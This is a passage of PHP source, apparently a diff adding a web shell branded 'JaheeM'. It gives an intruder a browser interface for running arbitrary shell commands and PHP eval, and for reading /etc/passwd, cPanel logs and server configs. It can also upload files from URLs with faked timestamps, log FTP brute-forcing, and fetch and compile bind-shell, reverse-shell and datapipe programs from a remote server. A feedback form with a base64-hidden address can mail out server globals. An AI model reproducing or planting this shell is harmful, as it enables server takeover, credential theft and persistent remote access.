    "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"JaheeM v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."N3tsh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "

    Read first:

    Users only with shell? 

    Logging? 
    Logging to file? 
    Logging to e-mail? 

    "; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "
    Permision denied!
    ";} + else + { + echo "Directory information:"; + if (!$win) + { + echo "
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); N3tshexit();} +if ($act == "security") +{ + echo "
    Server security information:
    Open base dir: ".$hopenbasedir."
    "; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
    "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
    From:  To:  

    "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
    "; + } + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} + else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
    ";} + } + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
    ";} + if (file_get_contents("/etc/motd")) {echo "Message Of The Day
    ";} + if (file_get_contents("/etc/hosts")) {echo "Hosts
    ";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
    ";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "
    Encoder:
    Input:




    Hashes:
    "; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." -
    "; + } + echo "
    Url:

    urlencode - +
    urldecode - +
    Base64:
    base64_encode -
    "; + echo "
    base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "";} + else {$rows++; echo "";} + echo " ^"; + } + echo "

    Base convertations:
    dec2hex -
    "; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using JaheeM v.".$shver."!"; N3tshexit(); } + else {echo "
    Can't delete ".__FILE__."!
    ";} + } + else + { + if (!empty($rndcode)) {echo "Error: incorrect confimation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
    Self-remove: ".__FILE__."
    Are you sure?
    For confirmation, enter \"".$rnd."\"
     "; + } +} +if ($act == "update") {$ret = N3tsh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

    ";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "JaheeM v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"JaheeM v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    "; + } + else {echo "
    Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    Your name:

    Your e-mail:

    Message:


    Attach server-info *

    There are no checking in the form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    We understand languages: English, Russian.

    ";} +} +if ($act == "search") +{ + echo "Search in file-system:
    "; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {N3tfsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "
    + +Search for (file/folder name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == "ls") {$dspact = $act; echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"Error: ".$err:"")."
    Owner

     Read
     Write
    eXecute
    Group

     Read
     Write
    eXecute
    World

     Read
     Write
    eXecute
    "; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "File upload:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";} + } + if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); N3t_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); N3t_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} N3t_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); N3t_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + N3t_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
    ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + N3t_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + N3t_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "Result of execution this command:
    "; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + @chdir($olddir); + } + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "
    Can't open folder (".htmlspecialchars($d).")!
    ";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "Name"; + $row[] = "Size"; + $row[] = "Modify"; + if (!$win) + {$row[] = "Owner/Group";} + $row[] = "Perms"; + $row[] = "Action"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = ""; + $y .= "\"".($parsesort[1]"; + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; N3tshexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = " [".$disppath."]"; + } + else + { + $type = "DIR"; + $row[] = " [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;} + else {$row[] = "\"Info\" \"Change\" \"Download\" ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "
    Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

    "; + foreach($table as $row) + { + echo "\r\n"; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    + +    + "; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "                   "; + } + echo " 

    "; + echo ""; + } +} +if ($act == "tools") +{ + $bndportsrcs = array( + "N3tsh_bindport.pl"=>array("Using PERL","perl %path %port"), + "N3tsh_bindport.c"=>array("Using C","%path %port %pass") + ); + $bcsrcs = array( + "N3tsh_backconn.pl"=>array("Using PERL","perl %path %host %port"), + "N3tsh_backconn.c"=>array("Using C","%path %host %port") + ); + $dpsrcs = array( + "N3tsh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + "N3tsh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") + ); + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_array($datapipe)) {$datapipe = array();} + + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + + if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} + if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + + if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} + if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} + if (!empty($bindsubmit)) + { + echo "Result of binding port:
    "; + $v = $bndportsrcs[$bind["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $w = explode(".",$bind["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = N3tgetsource($bind["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind["port"],$v[1]); + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to ".getenv("SERVER_ADDR").":".$bind["port"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View binder's process
    ";} + } + echo "
    "; + } + } + if (!empty($bcsubmit)) + { + echo "Result of back connection:
    "; + $v = $bcsrcs[$bc["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + else + { + $w = explode(".",$bc["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = N3tgetsource($bc["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc["host"],$v[1]); + $v[1] = str_replace("%port",$bc["port"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...
    "; + } + } + } + if (!empty($dpsubmit)) + { + echo "Result of datapipe-running:
    "; + $v = $dpsrcs[$datapipe["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $srcpath = $tmpdir.$datapipe["src"]; + $w = explode(".",$datapipe["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = N3tgetsource($datapipe["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); + $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); + $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} + else {echo "Running datapipe... ok! Connect to ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View datapipe process
    ";} + } + echo "
    "; + } + } + ?>Binding port:
    Port: "> Password: ">  
    +Back connection:
    HOST: "> Port: ">  
    +Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "!

    +Datapipe:
    HOST: "> Local port: ">  
    Note: sources will be downloaded from remote server.Processes:

    "; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i".$head[$i]."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) +{ + echo "
    "; + foreach($tab as $i=>$k) + { + echo ""; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";} + echo ""; + } + echo "
    ".$v."
    "; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "Result of execution this PHP-code:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
